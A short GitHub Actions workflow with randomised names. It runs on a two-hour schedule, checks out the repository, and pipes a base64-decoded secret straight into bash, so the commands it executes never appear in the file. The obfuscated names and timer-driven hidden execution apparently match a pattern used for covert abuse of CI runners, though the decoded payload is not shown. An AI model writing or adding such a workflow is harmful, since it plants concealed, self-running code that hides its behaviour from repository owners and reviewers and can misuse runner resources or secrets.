name: EioESs
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  CREjFpHUp:
    runs-on: ubuntu-latest
    env:
      HqCXPAnxd: ${{ secrets.wgKjapmfp }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.QGZBqvdpN }}" | base64 -d | bash
